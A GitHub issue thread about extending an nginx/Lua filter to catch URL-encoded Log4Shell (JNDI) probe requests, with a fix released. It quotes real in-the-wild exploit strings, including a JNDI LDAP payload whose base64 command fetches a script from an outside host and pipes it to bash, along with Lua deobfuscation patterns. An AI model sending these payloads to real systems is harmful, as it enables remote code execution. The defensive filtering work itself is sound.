Urlencoded characters are not caught

Question

Urlencoded characters are not caught

igor-mendix opened this issue 4 years ago · 8 comments

Hi,

Thanks for the great work with this config!

Latest version doesn't catch requests like this (saw them in the wild):

"GET /?$%7bjndi%3aldap%3a%2f%2fydfewi7vgckh3orxnb49cwkjoau0ip.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3adns%3a%2f%2fc8lg5ylo2ezz11xqi48cfocfn6twhl.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?$%7bjndi%3aiiop%3a%2f%2fu4zij83rzjyr5basijhrbvx14saiy7.d.x2f.me%2fa%7d=1 HTTP/1.1"
"GET /?%25pi%25to$%7bjndi%3adns%3a%2f%2fvts0e8tgqds3y5ijghfhph4pjgp6dv.d.x2f.me%2fa%7d=1 HTTP/1.1"

Don't know if it could cause exploitation of the vulnerability on the Java side, but might be worth it to include this in the filtering, just in case.

igor-mendix commented 4 years ago

Thanks!

👍1

Answer 1 · 2021-12-14T06:48:24.000Z

Thanks for reporting this!

Just checked our logs, and yes, we see such requests too.

"GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuMTAzLjcxLjIyMTo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMTIuMTAzLjcxLjIyMTo4MCl8YmFzaA==} HTTP/1.1"

I will release a new version in the next minutes. Testing seems to work:

$ curl 'https://target.example.com/?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1'
...
2021/12/14 07:47:40 [error] 20998#20998: *10032 [lua] rewrite_by_lua(luaheader.conf:36):26: Found potential log4j attack in request: /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1, client: 192.168.15.20, server: target.example.com, request: "GET /?$%7bjndi%3armi%3a%2f%2fu2xgjnirk44ljoue4g6b1q4pcgi66v.d.x2f.me%2fa%7d=1 HTTP/1.1", host: "target.example.com"

Answer 2 · 2021-12-14T07:23:44.000Z

Wouldn't it be better to use ngx.unescape_uri(str)? jndi itself may be escaped too. And I imagine it could also be obfuscated in the same way headers are, so maybe it'd be reasonable to unescape first, and then run it through the same transformations headers are going:

    s=string.gsub(s, "${lower:(%a+)}", "%1")
    s=string.gsub(s, "${upper:(%a+)}", "%1")
    s=string.gsub(s, "${env:[%a_-]+:%-([%a:])}", "%1")
    s=string.gsub(s, "${::%-(%a+)}", "%1")

Answer 3 · 2021-12-14T07:28:10.000Z

I will take a look at. Code collaborations are welcome, just saying ;-)

Answer 4 · 2021-12-14T07:30:25.000Z

I know, just don't have time right now to experiment (never did anything with Lua), and this is the case when it's better to realize it faster :)

Answer 5 · 2021-12-14T07:34:49.000Z

never did anything with Lua

Same here, kind of "forced to looking into lua" because of this vulnerability 😁 - but it's fascinating.

Answer 6 · 2021-12-14T09:50:47.000Z

I've added a new PR to address this topic.

Answer 7 · 2021-12-14T10:14:24.000Z

@igor-mendix Should be fixed now by #8